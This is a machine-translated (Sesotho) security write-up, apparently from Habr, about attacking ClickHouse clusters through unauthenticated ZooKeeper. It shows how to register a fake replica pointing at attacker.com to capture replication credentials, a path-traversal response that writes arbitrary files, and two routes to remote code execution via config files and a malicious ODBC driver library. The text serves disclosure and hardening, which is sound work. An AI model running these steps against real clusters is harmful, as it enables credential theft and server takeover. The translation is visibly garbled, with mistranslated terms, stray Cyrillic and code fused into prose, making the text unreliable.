Sehlooho sena se tla bua pale ea ts'oaetso e khethehileng haholo ho protocol ea ho pheta-pheta ea ClickHouse, hape e tla bontša hore na sebaka sa tlhaselo se ka atolosoa joang.
ClickHouse ke sebaka sa polokelo ea boitsebiso bakeng sa ho boloka boitsebiso bo bongata, hangata bo sebelisa likopi tse fetang bonngoe. Ho kopanya le ho pheta-pheta ho ClickHouse ho hahiloe ka holimo (ZK) mme o hloka litokelo tsa ho ngola.
Ts'ebetso ea kamehla ea ZK ha e hloke bopaki, kahoo likete tsa li-server tsa ZK tse sebelisetsoang ho lokisa Kafka, Hadoop, ClickHouse li fumaneha phatlalatsa.
Ho fokotsa sebaka sa hau sa tlhaselo, o lokela ho hlophisa netefatso le tumello kamehla ha o kenya ZooKeeper
Ho hlakile hore ho na le li-deerializations tsa Java tsa 0day, empa nahana hore mohlaseli a ka bala le ho ngolla ZooKeeper, e sebelisetsoang ho pheta-pheta ClickHouse.
Ha e hlophisitsoe ka mokhoa oa lihlopha, ClickHouse e tšehetsa lipotso tse ajoang , ho feta ho ZK - bakeng sa bona li-node li bōptjoa ka lakane /clickhouse/task_queue/ddl.
Ka mohlala, u etsa node /clickhouse/task_queue/ddl/query-0001 ka litaba:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']'me ka mor'a moo, tafole ea teko e tla hlakoloa ho li-server tsa cluster host1 le host2. DDL e boetse e ts'ehetsa ho botsa lipotso tsa CREATE/ALTER/DROP.
Ho utloahala ho tšosa? Empa mohlaseli a ka fumana liaterese tsa seva hokae?
e sebetsa boemong ba litafole ka bomong, e le hore ha tafole e bōptjoa ho ZK, ho hlalositsoe seva se tla ikarabella bakeng sa ho fapanyetsana metadata le likopi. Mohlala, ha o etsa kopo (ZK e tlameha ho hlophisoa, chXX - lebitso la replica, foobar - lebitso la tafole):
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;li-node li tla etsoa Litšiea и Metadata.
Litaba /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpNa hoa khoneha ho kopanya data ho tsoa sehlopheng see? Ho joalo, haeba kou ea phetiso (TCP/9009) ho seva chXX-address firewall e ke ke ea koaloa 'me netefatso ea ho ikatisa e ke ke ea hlophisoa. Joang ho tlola netefatso?
Motho ea hlaselang a ka etsa setšoantšo se secha ho ZK ka ho kopitsa litaba ho tsoa ho /clickhouse/tables/01-01/foobar/replicas/chXX le ho fetola moelelo host.
Litaba /clickhouse/tables/01–01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: httpEbe o hloka ho bolella li-replicas tse ling hore ho na le sebaka se secha sa data ho seva sa mohlaseli seo ba hlokang ho se nka - node e thehiloe ho ZK. /clickhouse/tables/01-01/foobar/log/log-00000000XX ( XX k'hamera e ntseng e hola ka mokhoa o ikhethileng, e lokelang ho ba kholo ho feta ea ho qetela lethathamong la liketsahalo):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2moo mohloli_replica - lebitso la setšoantšo sa mohlaseli se entsoeng mohatong o fetileng, block_id - ID block block, fumana - "fumana block" taelo (le ).
Ka mor'a moo, setšoantšo se seng le se seng se bala ketsahalo e ncha ka har'a log 'me se ea ho seva se laoloang ke mohlaseli ho fumana "block of data" (protocol ea replication ke binary, e sebetsang ka holim'a HTTP). Seva attacker.com e tla fumana likopo:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXXmoo XXX e leng data ea netefatso bakeng sa phetisetso. Maemong a mang, ena e kanna ea ba ak'haonte e nang le phihlello ho database ka protocol e kholo ea ClickHouse le protocol ea HTTP. Joalo ka ha u bone, sebaka sa tlhaselo se ba seholo haholo hobane ZooKeeper, e sebelisetsoang ho ikatisa, e siiloe ntle le netefatso e hlophisitsoeng.
Ha re shebeng mosebetsi oa ho fumana sekhechana sa data ho tsoa ho replica, e ngotsoe ka kholiseho e felletseng ea hore likopi tsohle li tlas'a taolo e nepahetseng mme ho na le ts'epo lipakeng tsa bona.
replication code code
Ts'ebetso e bala lethathamo la lifaele, ebe mabitso a tsona, boholo, litaba, ebe o li ngolla sistimi ea faele. Ho bohlokoa ho hlalosa ka thoko hore na data e bolokoa joang tsamaisong ea faele.
Ho na le li-subdirectory tse 'maloa ho /var/lib/clickhouse (sengoloa sa polokelo ea kamehla ho tsoa faeleng ea tlhophiso):
lifolakha - directory bakeng sa ho rekota , e sebelisoang ho hlaphoheloa ka mor'a tahlehelo ea data;
tmp - directory bakeng sa ho boloka lifaele tsa nakoana;
user_files - Ts'ebetso e nang le lifaele ho likopo e lekanyelitsoe bukeng ena (INTO OUTFILE le tse ling);
Metadata - lifaele tsa sql tse nang le litlhaloso tsa tafole;
preprocessed_configs - lifaele tsa tlhophiso tse nkiloeng ho tsoa ho /etc/clickhouse-server;
ya data - bukana ea 'nete e nang le data ka boeona, ntlheng ena bakeng sa database e' ngoe le e 'ngoe subdirectory e arohaneng e entsoe mona (mohlala /var/lib/clickhouse/data/default).
Bakeng sa tafole e 'ngoe le e' ngoe, lethathamo le le leng le le leng le thehiloe bukeng ea database. Kholomo ka 'ngoe e na le faele e arohaneng ho latela . Ka mohlala bakeng sa tafole foobare entsoeng ke mohlaseli, lifaele tse latelang li tla etsoa:
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2Replica e lebelletse ho amohela lifaele tse nang le mabitso a tšoanang ha o ntse o sebetsana le "block of data" mme ha e ba netefatse ka tsela efe kapa efe.
'Mali ea hlokolosi o se a utloile ka khokahano e sa bolokehang ea file_name ts'ebetsong WriteBufferFromFile. E, sena se lumella mohlaseli ho ngola litaba tse sa lumellaneng ho faele leha e le efe e ho FS e nang le litokelo tsa mosebedisi clickhouse. Ho etsa sena, setšoantšo se laoloang ke mohlaseli se tlameha ho khutlisa karabo e latelang ho kopo (likheo tsa mela li kentsoe molemong oa kutloisiso):
x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeperle ka mora concatenation ../../../../../../../../../tmp/pwned faele e tla ngoloa /tmp/pwned ka dikahare hellofromzookeeper.
Ho na le likhetho tse 'maloa tsa ho fetola bokhoni ba ho ngola faele hore e be ts'ebetso ea khoutu e hole (RCE).
Didikishinari tsa kantle ho RCE
Liphetolelong tsa khale, bukana e nang le litlhophiso tsa ClickHouse e ne e bolokiloe ka litokelo tsa mosebelisi Clickhouse ya kamehla. Lifaele tsa li-setting ke lifaele tsa XML tseo tšebeletso e li balang qalong ebe e li boloka /var/lib/clickhouse/preprocessed_configs. Ha liphetoho li etsahala, li baloa hape. Haeba u na le phihlello ho /etc/clickhouse-server mohlaseli a ka iketsetsa ea hae mofuta o ka phethisoang ebe o etsa khoutu e sa fetoheng. Liphetolelo tsa hona joale tsa ClickHouse ha li fane ka litokelo ka ho sa feleng, empa haeba seva se ne se ntlafatsoa butle-butle, litokelo tse joalo li ka sala. Haeba u tšehetsa sehlopha sa ClickHouse, hlahloba litokelo tsa lenane la litlhophiso, e tlameha ho ba tsa mosebedisi root.
ODBC ho ea ho RCE
Ha o kenya sephutheloana, mosebelisi o etsoa clickhouse, empa bukana ea eona ea lapeng ha e ea etsoa /nonexistent. Leha ho le joalo, ha ho sebelisoa lidikishinari tsa ka ntle, kapa ka mabaka a mang, batsamaisi ba etsa bukana /nonexistent le ho fa mosebedisi clickhouse phihlello ea ho e ngolla (SSZB! hoo e ka bang. mofetoleli).
ClickHouse e tšehetsa 'me e ka hokela ho li-database tse ling. Ho ODBC, o ka hlakisa tsela e eang laebraring ea mokhanni oa database (.so). Mefuta ea khale ea ClickHouse e u lumelletse ho etsa sena ka kotloloho ho sesebelisoa sa kopo, empa joale cheke e tiileng ea khoele ea khokahano e kentsoe ho odbc-bridge, kahoo ha ho sa khoneha ho hlalosa tsela ea mokhanni ho tloha kopo. Empa na mohlaseli a ka ngolla bukana ea lehae a sebelisa bofokoli bo hlalositsoeng ka holimo?
Ha re theheng faele ~/.odbc.ini ka litaba tse kang tsena:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.soebe qalong SELECT * FROM odbc('DSN=lalala', 'test', 'test'); laebrari e tla kenngoa test.so mme e amohetse RCE (kea leboha bakeng sa ntlha).
Bofokoli bona le bo bong bo lokisitsoe ho ClickHouse version 19.14.3. Hlokomela ClickHouse ea hau le ZooKeepers!
Source: www.habr.com